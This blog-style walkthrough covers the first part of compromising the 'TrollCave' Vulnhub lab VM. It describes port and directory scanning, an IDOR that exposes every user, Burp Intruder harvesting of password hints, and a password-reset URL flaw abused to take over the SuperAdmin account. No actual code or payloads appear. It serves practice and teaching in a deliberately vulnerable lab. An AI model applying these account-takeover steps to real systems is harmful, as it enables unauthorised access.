TrollCave Boot to Root VM Walkthrough PART ONE

Introduction

Today we’ll begin the process of compromising one of Vulnhub’s latest VMs, “TrollCave”. The author, David Yates, says that this VM is attempting to be as realistic as possible, AKA straying from the usual contrived scenarios which pop up in some CTFs (port knocking, MP3 file waveform analysis etc.)

The author has also stressed that a kernel exploit isn’t required to root this box, so that’ll save some time when we come to privesc the box later.

This is the first VM which has tested me to the point where I’ve had to stop and take a break, as such this write up only covers from enumeration through to getting admin in the webapp – part 2 of the write up will detail how to shell the box and continue exploitation.

Let’s go and break stuff!

NMap

Nothing hugely exciting here, there’s an NGINX webserver and an SSH server. Let’s go and poke the webserver (whilst running the usual tools against it.)

Nikto

A few interesting things pop out here.ย /login/ย is obviously of interest to us, as is login.php. I have no idea why there’s a login.php3 and a login.asp there.. that requires some investigating.

Dirb

Dirb foundย allย the treats! There’s that weird pattern again, admin.cgi, admin.php, admin.pl… No admin.asp this time though (for some reason.) let’s fire up the app in our browser and go to town on it.

Manual enumeration

So at first glance it’s a nicely designed, well locked down blog.

All of the interesting findings from above are locked down with access control saying that you must be logged in. No obvious LFI vectors in the URLs, but there is is an IDOR problem that we can use to enumerate every user in the app.

When navigating to a user’s profile page the URL changes from user/1 to user/2 etc. so we can write a little script to enumerate all users –

Yeah the script’s a little ugly but hey, I’m a programmer and sometimes it’s fun to be a bit sloppy! ๐Ÿ˜‰

So we’ve got a list of all users now. We notice that when we try and log in we get given a little password hint by the app.. Let’s use this lovely data to get all of the password hints using Burpsuite –

I used the awesome Intruder module in burpsuite to query for every user, then used the results processing options to pull out just the hints from the results!

King ๐Ÿ™‚
dave nah lol
dragon Over fire and over stone…
coderguy ๐Ÿ™‚
cooldude89 i am the dankest
Sir It’s super secure
Q Your normal password
teflon swordfish
TheDankMan 420
artemus garden
MrPotatoHead you know…
Ian a
kev mother’s maiden name
notanother (:
anybodyhome no one is
onlyme It is what it is
xer fave pronoun

And we’re done! So now we can start trying to guess some passwords using these cryptic hints..

And get nowhere. Blargh.

Password Reset Pwnage

So after looking over all of the blog posts a bit closer, I spot one which mentions a half-implemented password reset function written in Ruby! So after Googling how to do password resets in Ruby on Rails I came across this absolute belter, which lead me to trying various password_reset URLs until I came across this gem (see what I did there..!)

Uh oh… That doesn’t look good does it! ๐Ÿ˜‰

Let’s reset King, the SuperAdmin’s password.

Bah! It’ll still let us progress further anyway, let’s pick a member and reset their password.

Ugh! More roadblocks! Although look at that URL.. What would happen if we swapped ‘xer’ for ‘King’..?

So far so good, it’s given us a proper password reset form. Let’s add a password and see if it works.

BINGO! We’re King the Superadmin! How awesome is that?

Conclusion

I’ve decided to park this VM for now, until my skills improve a little more and I’m able to fully compromise this box. Part 2 will be written and posted within the next few months, all being well.

Huge thanks to this box’s creator (link in Introduction) this is a really unique challenge which I’ve thoroughly enjoyed so far.

 

5 Comments

Add a Comment

Your email address will not be published. Required fields are marked *